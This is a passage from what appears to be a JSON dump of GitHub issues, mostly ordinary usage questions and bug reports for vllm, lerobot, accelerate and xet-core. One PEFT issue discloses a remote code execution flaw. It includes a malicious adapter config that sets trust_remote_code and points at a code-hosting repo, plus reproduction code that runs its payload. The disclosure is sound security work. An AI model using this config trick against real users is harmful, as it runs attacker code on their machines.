libraries\n==============================\n[pip3] flashinfer-python==0.3.1\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cuspa", "url": "https://github.com/vllm-project/vllm/issues/28003", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T21:19:15Z", "updated_at": "2025-11-26T15:32:40Z", "comments": 1, "user": "amitmvyas" }, { "repo": "vllm-project/vllm", "number": 27995, "title": "[RFC]: Make PassConfig flags less verbose", "body": "### Motivation.\n\nAlmost all `PassConfig` field names have `enable_` in the name, which is unnecessarily verbose. They are also pretty long, and sometimes not descriptive enough. Finally, `enable_fusion` should be split into rmsnorm+quant and activation+quant flags as we want to control these flags separately.\n\n### Proposed Change.\n\nWe should rename the flags:\n- `enable_async_tp` -> `fuse_gemm_comms`\n- `enable_attn_fusion` -> `fuse_attn_quant` \n- `enable_fi_allreduce_fusion` -> `fuse_allreduce_rms` \n- `enable_fusion` -> `fuse_norm_quant`, `fuse_act_quant`\n- `enable_noop` -> `eliminate_noops`\n- `enable_sequence_parallelism` -> `enable_sp`\n\nFor future RoPE-based fusion passes, the flags will look like:\n- `enable_qknorm_rope_fusion` -> `fuse_qknorm_rope`\n- `enable_rope_cache_fusion` -> `fuse_rope_cache`\n- ...\n\nWe can deprecate the original flags in the next release and map them to the new ones, and remove them 1 or even 2 releases later (shouldn't be hard to support). These flags will be used less commonly after `-O` optimization levels land anyway.\n\n### Feedback Period.\n\n1 week, 11/3 - 11/7\n\n### CC List.\n\n@zou3519 @youkaichao @mgoin @ilmarkov @nvpohanh @pavanimajety \n\n### Any Other Things.\n\nWith passes following a common construction convention, we can also add a `full_pass_pipeline` arg where users can control the exact order of the passes if necessary, but that is less likely to be needed urgently and can be added later.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27995", "state": "closed", "labels": [ "help wanted", "good first issue", "RFC", "torch.compile" ], "created_at": "2025-11-03T17:49:29Z", "updated_at": "2025-12-03T19:53:01Z", "comments": 7, "user": "ProExpertProg" }, { "repo": "huggingface/peft", "number": 2888, "title": "Potential remote code execution via untrusted tokenizer_kwargs in PromptEmbedding", "body": "### Description\n\nA remote code execution vector exists in the PEFT prompt-tuning flow. A remote `adapter_config.json` can inject loader kwargs that are forwarded to `AutoTokenizer.from_pretrained` calls. If an attacker sets `\"tokenizer_kwargs\": {\"trust_remote_code\": true}` and points `tokenizer_name_or_path` at an attacker-controlled repo, constructing the prompt embedding will cause `AutoTokenizer.from_pretrained(...)` to import and run code from that repo. 
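\n\nThe dangerous call pattern, as a minimal sketch (the wrapper function and its name are illustrative, not PEFT's actual API; the real code is linked under Root Cause below):\n\n```python\nfrom transformers import AutoTokenizer\n\ndef load_prompt_tuning_tokenizer(config):\n    # Both fields below come straight from the downloaded adapter_config.json,\n    # so for a remote adapter they are attacker-controlled.\n    tokenizer_kwargs = getattr(config, \"tokenizer_kwargs\", None) or {}\n    # If the config injected {\"trust_remote_code\": true}, this call imports and\n    # executes Python from the attacker's tokenizer repo.\n    return AutoTokenizer.from_pretrained(config.tokenizer_name_or_path, **tokenizer_kwargs)\n```\n\n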
All of this happens during normal initialization and requires no further user interaction.\n\n### Root Cause \n\n`PromptEmbedding` trusts and forwards fields from config into `AutoTokenizer.from_pretrained` without validating or sanitizing them:\n\nhttps://github.com/huggingface/peft/blob/30a19a08f9ef85ce1095b9ac69e78269121525e2/src/peft/tuners/prompt_tuning/model.py#L78-L84 \n\n### Impact\n\nThis issue turns remote configuration files into attack vectors. Any user who loads a malicious adapter config can have arbitrary code executed on their machine. The compromise is silent, requires no extra user action beyond `from_pretrained`, and is easy to weaponize by publishing a seemingly legitimate config that explicitly sets `trust_remote_code=True` and points to attacker code. Consequences include command execution, credential and data theft, file tampering, and worm infection if environment tokens or write permissions are present. This should be fixed urgently by treating config-supplied kwargs as untrusted: filter or reject sensitive parameters such as `trust_remote_code`. \n\n### Who can help?\n\n@benjaminbossan @githubnemo\n\n### Reproduction\n\nA malicious remote config can look like:\n\n```json\n{\n \"base_model_name_or_path\": \"XManFromXlab/peft-prompt-embedding-rce\",\n \"tokenizer_name_or_path\": \"XManFromXlab/peft-prompt-embedding-rce\",\n \"tokenizer_kwargs\": { \"trust_remote_code\": true }\n}\n```\n\nWhen users are lured to the repo and use PEFT to load the config from the remote repo:\n\n```python\nfrom peft import PromptEmbedding, PromptTuningConfig\nfrom transformers import AutoModelForSeq2SeqLM\n\nt5_model = AutoModelForSeq2SeqLM.from_pretrained(\"t5-base\")\n\nexample_model = \"XManFromXlab/peft-prompt-embedding-rce\"\nconfig = PromptTuningConfig.from_pretrained(example_model, trust_remote_code=False)\nprompt_embedding = PromptEmbedding(config, t5_model.shared)\n```\n\nDuring `PromptEmbedding` initialization the code reads `tokenizer_kwargs` from the remote config and calls `AutoTokenizer.from_pretrained(config.tokenizer_name_or_path, **tokenizer_kwargs)`. Because `trust_remote_code` was injected via the config, the loader imports and executes the attacker’s backend code, demonstrating RCE.\n\n\n### Expected behavior\n\n\nIn my example, the above code will print the message 'Execute Malicious Payload!!!!!!', which indicates the execution of malicious scripts.\n\n```bash\n$ python3 main.py \nExecute Malicious Payload!!!!!! \nExecute Malicious Payload!!!!!!\nExecute Malicious Payload!!!!!! 
\n```", "url": "https://github.com/huggingface/peft/issues/2888", "state": "closed", "labels": [], "created_at": "2025-11-03T16:04:52Z", "updated_at": "2025-11-04T17:50:28Z", "comments": 3, "user": "Vancir" }, { "repo": "huggingface/lerobot", "number": 2371, "title": "Memory increases continuously during Groot training", "body": "### System Info\n\n```Shell\n- lerobot version: 0.4.1\n- Platform: Linux-5.4.250-2-velinux1u3-amd64-x86_64-with-glibc2.31\n- Python version: 3.10.15\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.1.3\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA GeForce RTX 4090\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrun\n` lerobot-train \\\n --output_dir=$OUTPUT_DIR \\\n --save_checkpoint=true \\\n --batch_size=64 \\\n --steps=10000 \\\n --save_freq=1000 \\\n --log_freq=100 \\\n --policy.push_to_hub=false \\\n --policy.type=groot \\\n --dataset.repo_id=$DATASET_ID \\\n --dataset.root=$DATASET_ROOT_DIR \\\n --dataset.streaming=false \\\n --dataset.image_transforms.enable=true \\\n --wandb.enable=true \\\n --wandb.mode=offline \\\n --wandb.project=groot_test \\\n --job_name=$JOB_NAME \\`\n\n### Expected behavior\n\nMemory increases until out of memory.", "url": "https://github.com/huggingface/lerobot/issues/2371", "state": "open", "labels": [ "question", "policies", "performance" ], "created_at": "2025-11-03T14:38:52Z", "updated_at": "2025-12-31T13:17:11Z", "user": "caoran2025" }, { "repo": "vllm-project/vllm", "number": 27982, "title": "[Usage]: How can I access or return hidden states (representations) after generation?", "body": "### Your current environment\n\nIn my training pipeline (GRPO), I need to access hidden-state representations of all layers and store prompt representations alongside generated sequences.\nIs there any supported way to extract or return hidden states from the vLLM inference engine?\n\nEnvironment\nvllm==0.11.0\nPython 3.12\n\n### How would you like to use vllm\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27982", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T13:01:51Z", "updated_at": "2025-11-04T03:07:40Z", "comments": 1, "user": "hakbari14" }, { "repo": "huggingface/lerobot", "number": 2368, "title": "Release 0.5.0", "body": "A GitHub issue created for the upcoming release to discuss the planned features & changes:\n\n* Audio PR #967 \n* Bump transformers dependency to +v5", "url": "https://github.com/huggingface/lerobot/issues/2368", "state": "open", "labels": [ "bug", "question", "dependencies" ], "created_at": "2025-11-03T12:46:51Z", "updated_at": "2025-12-24T00:08:16Z", "user": "imstevenpmwork" }, { "repo": "vllm-project/vllm", "number": 27981, "title": "[Usage]: How to specify max_pixels for Qwen2.5-VL", "body": "### Your current environment\n\nAs the title says, I tried ``--mm-processor-kwargs {\"max_pixels\": $MAX_PIXELS}`` but it had no effect.\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27981", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-03T12:38:34Z", "updated_at": "2025-11-04T08:19:54Z", "comments": 3, "user": "aJupyter" }, { "repo": "huggingface/accelerate", "number": 3829, "title": "Does Accelerate automatically set the DataLoader\u2019s sampler to a DistributedSampler?", "body": "```python\nfrom accelerate import Accelerator\naccelerator = Accelerator()\n\ndevice = accelerator.device\nmodel, optimizer, training_dataloader, scheduler = accelerator.prepare(\n model, optimizer, training_dataloader, scheduler\n)\n\nfor batch in training_dataloader:\n optimizer.zero_grad()\n inputs, targets = batch\n outputs = model(inputs)\n loss = loss_function(outputs, targets)\n accelerator.backward(loss)\n optimizer.step()\n scheduler.step()\n```\n\nWe know that in PyTorch DDP training the DataLoader must use torch.utils.data.DistributedSampler. In this code, when using Accelerate, do we need to manually set DistributedSampler when constructing the `training_dataloader`, or will Accelerate automatically modify the dataloader\u2019s sampler to support DDP later? (In other words, when we build the dataloader for Accelerate, can we completely ignore DistributedSampler and just leave it as we would for single\u2011GPU training?)", "url": "https://github.com/huggingface/accelerate/issues/3829", "state": "closed", "labels": [], "created_at": "2025-11-03T07:17:29Z", "updated_at": "2025-12-16T15:09:43Z", "comments": 2, "user": "caixxiong" }, { "repo": "vllm-project/vllm", "number": 27957, "title": "[Usage]: What is the difference between embedding task and pooler task?", "body": "### Your current environment\n\nAny document about this? \n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27957", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-03T03:38:39Z", "updated_at": "2025-11-03T10:20:18Z", "comments": 1, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 27949, "title": "[Usage]: How do I deploy GGUF models with vLLM via Docker correct?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\nHere is the output from `sudo python3 collect_env.py`\n\n```\nTraceback (most recent call last):\n File \"/export/nvme/vllm/collect_env.py\", line 18, in \n import regex as re\nModuleNotFoundError: No module named 'regex'\n```\n\n### How would you like to use vllm\n\nI am using an Ubuntu 22.04 LTS LXC in Proxmox.\n\nI have Docker installed.\n\nI downloaded `https://huggingface.co/unsloth/DeepSeek-R1-Distill-Llama-70B-GGUF/resolve/main/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf?download=true` to `/export/nvme/huggingface/DeepSeek-R1-Distill-Llama-70B-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf` via `wget`.\n\nThe command that I am trying to use to start said Docker container is:\n\n```\nsudo docker run --runtime nvidia --gpus all \\\n --name vllm \\\n -v /export/nvme/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF:/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF \\\n -v /export/nvme/vllm:/export/nvme/vllm \\\n -e TRANSFORMERS_OFFLINE=1 \\\n --shm-size=16G \\\n -v /dev/shm:/dev/shm \\\n -p 0.0.0.0:8000:8000 \\\n --security-opt apparmor:unconfined \\\n vllm/vllm-openai:v0.8.5 \\\n --model /root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf \\\n --tokenizer /root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B \\\n --tensor-parallel-size 2 \\\n --max-model-len=32K \\\n --chat-template=/export/nvme/vllm/examples/tool_chat_template_deepseekr1.jinja\n```\n\nBut this is the error message that I get:\n```\nINFO 11-02 15:21:55 [__init__.py:239] Automatically detected platform cuda.\nINFO 11-02 15:21:59 [api_server.py:1043] vLLM API server version 0.8.5\nINFO 11-02 15:21:59 [api_server.py:1044] args: Namespace(host=None, port=8000, uvicorn_log_level='info', disable_uvicorn_access_log=False, allow_credentials=False, allowed_origins=['*'], allowed_methods=['*'], allowed_headers=['*'], api_key=None, lora_modules=None, prompt_adapters=None, chat_template='/export/nvme/vllm/examples/tool_chat_template_deepseekr1.jinja', chat_template_content_format='auto', response_role='assistant', ssl_keyfile=None, ssl_certfile=None, ssl_ca_certs=None, enable_ssl_refresh=False, ssl_cert_reqs=0, root_path=None, middleware=[], return_tokens_as_token_ids=False, disable_frontend_multiprocessing=False, enable_request_id_headers=False, enable_auto_tool_choice=False, tool_call_parser=None, tool_parser_plugin='', model='/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B-Q4_K_M-GGUF/DeepSeek-R1-Distill-Llama-70B-Q4_K_M.gguf', task='auto', tokenizer='/root/.cache/huggingface/DeepSeek-R1-Distill-Llama-70B', hf_config_path=None, skip_tokenizer_init=False, revision=None, code_revision=None, tokenizer_revision=None, tokenizer_mode='auto', trust_remote_code=False, allowed_local_media_path=None, 
load_format='auto', download_dir=None, model_loader_extra_config={}, use_tqdm_on_load=True, config_format=, dtype='auto', max_model_len=32768, guided_decoding_backend='auto', reasoning_parser=None, logits_processor_pattern=None, model_impl='auto', distributed_executor_backend=None, pipeline_parallel_size=1, tensor_parallel_size=2, data_parallel_size=1, enable_expert_parallel=False, max_parallel_loading_workers=None, ray_workers_use_nsight=False, disable_custom_all_reduce=False, block_size=None, gpu_memory_utilization=0.9, swap_space=4, kv_cache_dtype='auto', num_gpu_blocks_override=None, enable_prefix_caching=None, prefix_caching_hash_algo='builtin', cpu_offload_gb=0, calculate_kv_scales=False, disable_sliding_window=False, use_v2_block_manager=True, seed=None, max_logprobs=20, disable_log_stats=False, quantization=None, rope_scaling=None, rope_theta=None, hf_token=None, hf_overrides=None, enforce_eager=False, max_seq_len_to_capture=8192, tokenizer_pool_size=0, tokenizer_pool_type='ray', tokenizer_pool_extra_config={}, limit_mm_per_prompt={}, mm_processor_kwargs=None, disable_mm_preprocessor_cache=False, enable_lora=None, enable_lora_bias=False, max_loras=1, max_lora_rank=16, lora_extra_vocab_size=256, lora_dtype='auto', long_lora_scaling_factors=None, max_cpu_loras=None, fully_sharded_loras=False, enable_prompt_adapter=None, max_prompt_adapters=1, max_prompt_adapter_token=0, device='auto', speculative_config=None, ignore_patterns=[], served_model_name=None, qlora_adapter_name_or_path=None, show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, disable_async_output_proc=False, max_num_batched_tokens=None, max_num_seqs=None, max_num_partial_prefills=1, max_long_partial_prefills=1, long_prefill_token_threshold=0, num_lookahead_slots=0, scheduler_delay_factor=0.0, preemption_mode=None, num_scheduler_steps=1, multi_step_stream_outputs=True, scheduling_policy='fcfs', enable_chunked_prefill=None, disable_chunked_mm_input=False, scheduler_cls='vllm.core.scheduler.Scheduler', override_neuron_config=None, override_pooler_config=None, compilati", "url": "https://github.com/vllm-project/vllm/issues/27949", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-02T23:33:49Z", "updated_at": "2025-11-02T23:36:44Z", "comments": 1, "user": "alpha754293" }, { "repo": "huggingface/xet-core", "number": 549, "title": "How to get the \"Xet backed hash\"?", "body": "Hi,\n\nOn HuggingFace, every page has a \"Xet backed hash\" (I've attached an example below) and I am trying to figure out how to compute that locally.\n\nI've read the documentation and it says there are 4 different types of hashes but it's not really clear how a \"Xet backed hash\" is calculated.\n\nSo I was just wondering if you can tell me how I can get the \"Xet backed hash\" on a local file?\n\nThank you for your time.\n\n\"Image\"", "url": "https://github.com/huggingface/xet-core/issues/549", "state": "closed", "labels": [], "created_at": "2025-11-02T09:40:39Z", "updated_at": "2025-11-06T16:20:25Z", "user": "arch-btw" }, { "repo": "huggingface/lerobot", "number": 2360, "title": "diffusion transformer", "body": "Has anyone changed the diffusion UNet to a DiT in lerobot?", "url": "https://github.com/huggingface/lerobot/issues/2360", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-11-02T09:05:30Z", "updated_at": "2025-11-12T09:01:59Z", "user": "Benxiaogu" }, { "repo": "vllm-project/vllm", "number": 27928, "title": "[Bug]: What 
happened to /get_world_size ?", "body": "### Your current environment\n\nvllm 0.11.0\ntrl 0.24.0\npython 3.12\nlinux amd64\n\n### \ud83d\udc1b Describe the bug\n\nTRL is expecting a `/get_world_size` route https://github.com/huggingface/trl/blob/main/trl/extras/vllm_client.py#L279 for its GRPO trainer. That gives a 404 on the latest version of vLLM. \n\nWas this changed to another route? I can't seem to find it\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27928", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-01T22:56:45Z", "updated_at": "2025-11-03T02:42:14Z", "comments": 1, "user": "pbarker-synth" }, { "repo": "huggingface/lerobot", "number": 2356, "title": "AsyncInference only running one action chunk", "body": "I have my SO101 arms connected to my computer, and I'm running an asynchronous server on a cloud GPU with a RTX 4090.\n\nWhen I start running Pi0.5, the model is loaded and the SO101 makes its first move by setting the robot to be at its middle position, but then no further actions are made although the server logs new observations and action sequences being generated.\n\nThe robot moves to this position and doesn't move further:\n\n\"Image\"\n\nI have one wrist camera and one top-down view camera. Here is my client command:\n```\npython3 -m lerobot.async_inference.robot_client \\\n --server_address=ip:port \\\n --robot.type=so101_follower \\\n --robot.port=/dev/ttyACM0 \\\n --robot.id=arm \\\n --robot.cameras=\"{ base_0_rgb: {type: opencv, index_or_path: \\\"/dev/video2\\\", width: 640, height: 480, fps: 30}, left_wrist_0_rgb: {type: opencv, index_or_path: \\\"/dev/video0\\\", width: 640, height: 480, fps: 30}}\" \\\n --policy_device=cuda \\\n --aggregate_fn_name=weighted_average \\\n --debug_visualize_queue_size=True \\\n --task=\"Pick up the orange and place it on the plate\" \\\n --policy_type=pi05 \\\n --pretrained_name_or_path=lerobot/pi05_base \\\n --actions_per_chunk=50 \\\n --chunk_size_threshold=0.0 \\\n --debug_visualize_queue_size=True\n```\n\nHere are my server logs:\n```\n(lerobot) root@eff66f201198:/workspace/arm-x64# ./robot.sh runpod async-server\nINFO 2025-11-01 20:17:34 y_server.py:421 {'fps': 30,\n 'host': '0.0.0.0',\n 'inference_latency': 0.03333333333333333,\n 'obs_queue_timeout': 2,\n 'port': 8080}\nINFO 2025-11-01 20:17:34 y_server.py:431 PolicyServer started on 0.0.0.0:8080\nINFO 2025-11-01 20:18:03 y_server.py:112 Client ipv4:129.97.131.28:23025 connected and ready\nINFO 2025-11-01 20:18:03 y_server.py:138 Receiving policy instructions from ipv4:129.97.131.28:23025 | Policy type: pi05 | Pretrained name or path: lerobot/pi05_base | Actions per chunk: 50 | Device: cuda\nThe PI05 model is a direct port of the OpenPI implementation. \nThis implementation follows the original OpenPI structure for compatibility. \nOriginal implementation: https://github.com/Physical-Intelligence/openpi\nINFO 2025-11-01 20:18:03 ils/utils.py:43 Cuda backend detected, using cuda.\nWARNING 2025-11-01 20:18:03 /policies.py:82 Device 'mps' is not available. Switching to 'cuda'.\nINFO 2025-11-01 20:18:03 ils/utils.py:43 Cuda backend detected, using cuda.\nWARNING 2025-11-01 20:18:03 /policies.py:82 Device 'mps' is not available. 
Switching to 'cuda'.\nLoading model from: lerobot/pi05_base\n\u2713 Loaded state dict from model.safetensors\nWARNING 2025-11-01 20:19:08 ng_pi05.py:1023 Vision embedding key might need handling: paligemma_with_expert.paligemma.model.vision_tower.vision_model.embeddings.patch_embedding.bias\nWARNING 2025-11-01 20:19:08 ng_pi05.py:1023 Vision embedding key might need handling: paligemma_with_expert.paligemma.model.vision_tower.vision_model.embeddings.patch_embedding.weight\nRemapped: action_in_proj.bias -> model.action_in_proj.bias\nRemapped: action_in_proj.weight -> model.action_in_proj.weight\nRemapped: action_out_proj.bias -> model.action_out_proj.bias\nRemapped: action_out_proj.weight -> model.action_out_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.lm_head.weight -> model.paligemma_with_expert.gemma_expert.lm_head.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.bias -> model.paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.bias\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.input_layernorm.dense.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.down_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.down_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.gate_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.gate_proj.weight\nRemapped: paligemma_with_expert.gemma_expert.model.layers.0.mlp.up_proj.weight -> model.paligemma_with_expert.gemma_expert.model.layers.0.mlp.up_proj.weight\nRemapped 812 state dict keys\nWarning: Could not remap state dict keys: Error(s) in loading state_dict for PI05Policy:\n\tMissing key(s) in state_dict: \"model.paligemma_with_expert.paligemma.model.language_model.embed_tokens.weight\". \nINFO 2025-11-01 20:19:43 y_server.py:171 Time taken to put policy on cuda: 99.9787 seconds\nINFO 2025-11-01 20:19:43 ort/utils.py:74 Starting receiver\nINFO 2025-11-01 20:20:02 y_server.py:226 Running inference for observation #0 (must_go: True)\nINFO 2025-11-01 20:20:03 ort/utils.py:74 Starting receiver\nINFO 2025-11-01 20:20:04 y_server.py:362 Preprocessing and inference took 1.3530s, action shape: torch.Size([1, 50, 32])\nINFO 2025-11-01 20:20:04 y_server.py:392 Observation ", "url": "https://github.com/huggingface/lerobot/issues/2356", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-11-01T20:31:10Z", "updated_at": "2025-12-23T01:10:35Z", "user": "kevinjosethomas" }, { "repo": "vllm-project/vllm", "number": 27916, "title": "[Feature]: Does the latest version support LoRa for visual models?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWhen I loaded the QWEN2.5-VL model fine-tuned by LoRa using vllm version 0.8.4, I encountered the following prompt:\n\n> Regarding multimodal models, vLLM currently only supports adding LoRA to language model, visual.blocks.31.mlp.up_proj will be ignored.\n\nI found an issue https://github.com/vllm-project/vllm/issues/26422 with a similar problem, but it seems the PR hasn't been merged into master. 
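\n\nFor context, a quick way to see how much of an adapter actually targets the vision tower (a minimal sketch; the adapter file name and the `visual.` key prefix are assumptions based on the warning above):\n\n```python\nfrom safetensors import safe_open\n\n# List adapter tensors whose keys sit under the vision tower.\nwith safe_open(\"adapter_model.safetensors\", framework=\"pt\", device=\"cpu\") as f:\n    keys = list(f.keys())\n    visual = [k for k in keys if \"visual.\" in k]\nprint(f\"{len(visual)} of {len(keys)} adapter tensors target the vision tower\")\n```\n\n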
How can I enable loading visual-side LoRA parameters and use vLLM to accelerate inference?\n\nLooking forward to your reply.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27916", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-01T12:23:36Z", "updated_at": "2025-12-26T12:48:22Z", "comments": 1, "user": "SmartNight-cc" }, { "repo": "huggingface/lerobot", "number": 2354, "title": "Cannot reproduce SmolVLA results on LIBERO benchmark", "body": "Hello,\n\nI am trying to reproduce the LIBERO benchmark results of [SmolVLA](https://huggingface.co/HuggingFaceVLA/smolvla_libero). \nHowever, I can't reproduce the results on either the [leaderboard](https://huggingface.co/spaces/HuggingFaceVLA/libero-vla-leaderboard) or the [paper](https://arxiv.org/abs/2506.01844).\n\nI am working on an NVIDIA Jetson AGX Orin Developer Kit (JetPack 6.2.1, Jetson Linux 36.4.4), \nand below is my pip list.\n\n
\npip list\n\n```\nabsl-py==2.3.1\naccelerate==1.10.1\naiohappyeyeballs==2.6.1\naiohttp==3.13.0\naiosignal==1.4.0\nannotated-types==0.7.0\nantlr4-python3-runtime==4.9.3\nanyio==4.9.0\nargon2-cffi==23.1.0\nargon2-cffi-bindings==21.2.0\narrow==1.3.0\nasttokens==3.0.0\nasync-lru==2.0.5\nattrs==23.2.0\nav==15.1.0\nbabel==2.17.0\nbddl==1.0.1\nbeautifulsoup4==4.13.4\nbleach==6.2.0\nblinker==1.7.0\ncertifi==2025.1.31\ncffi==1.17.1\ncharset-normalizer==3.4.1\nclick==8.3.0\ncloudpickle==3.1.1\ncmake==3.31.6\ncomm==0.2.2\ncontourpy==1.3.2\ncryptography==41.0.7\ncuda-bindings==12.8.0\ncuda-python==12.8.0\ncycler==0.12.1\nCython==3.0.12\ndataclasses==0.6\ndatasets==4.1.1\ndbus-python==1.3.2\ndebugpy==1.8.14\ndecorator==5.2.1\ndeepdiff==8.6.1\ndefusedxml==0.7.1\ndiffusers @ file:///opt/diffusers-0.34.0.dev0-py3-none-any.whl#sha256=cf07a8004c994f02e0d41e9bface90486f53a98cd3abdda39972c5ffe7009d87\ndill==0.4.0\ndistro==1.9.0\ndocopt==0.6.2\ndocutils==0.21.2\ndraccus==0.10.0\neasydict==1.13\negl_probe @ git+https://github.com/huggingface/egl_probe.git@eb5e5f882236a5668e43a0e78121aaa10cdf2243\neinops==0.8.1\netils==1.13.0\nevdev==1.9.2\nexecuting==2.2.0\nFarama-Notifications==0.0.4\nfastjsonschema==2.21.1\nfilelock==3.18.0\nfonttools==4.57.0\nfqdn==1.5.1\nfrozenlist==1.8.0\nfsspec==2025.3.2\nfuture==1.0.0\ngitdb==4.0.12\nGitPython==3.1.45\nglfw==2.10.0\ngrpcio==1.75.1\ngym==0.26.2\ngym-notices==0.1.0\ngymnasium==0.29.1\nh11==0.14.0\nh5py==3.13.0\nhf-xet==1.1.10\nhf_transfer==0.1.9\nhttpcore==1.0.8\nhttplib2==0.20.4\nhttpx==0.28.1\nhuggingface-hub==0.35.3\nhydra-core==1.3.2\nid==1.5.0\nidna==3.10\nimageio==2.37.0\nimageio-ffmpeg==0.6.0\nimportlib_metadata==8.6.1\nimportlib_resources==6.5.2\niniconfig==2.1.0\ninquirerpy==0.3.4\nipykernel==6.29.5\nipython==9.1.0\nipython_pygments_lexers==1.1.1\nipywidgets==8.1.6\nisoduration==20.11.0\njaraco.classes==3.4.0\njaraco.context==6.0.1\njaraco.functools==4.1.0\njedi==0.19.2\njeepney==0.9.0\nJinja2==3.1.6\njson5==0.12.0\njsonlines==4.0.0\njsonpointer==3.0.0\njsonschema==4.23.0\njsonschema-specifications==2025.4.1\njupyter==1.1.1\njupyter-console==6.6.3\njupyter-events==0.12.0\njupyter-lsp==2.2.5\njupyter_client==8.6.3\njupyter_core==5.7.2\njupyter_server==2.15.0\njupyter_server_terminals==0.5.3\njupyterlab==4.4.1\njupyterlab_myst==2.4.2\njupyterlab_pygments==0.3.0\njupyterlab_server==2.27.3\njupyterlab_widgets==3.0.14\njupytext==1.17.3\nkeyring==25.6.0\nkiwisolver==1.4.8\nlaunchpadlib==1.11.0\nlazr.restfulclient==0.14.6\nlazr.uri==1.0.6\n-e git+https://github.com/huggingface/lerobot@6f5bb4d4a49fbdb47acfeaa2c190b5fa125f645a#egg=lerobot\nlibero @ 
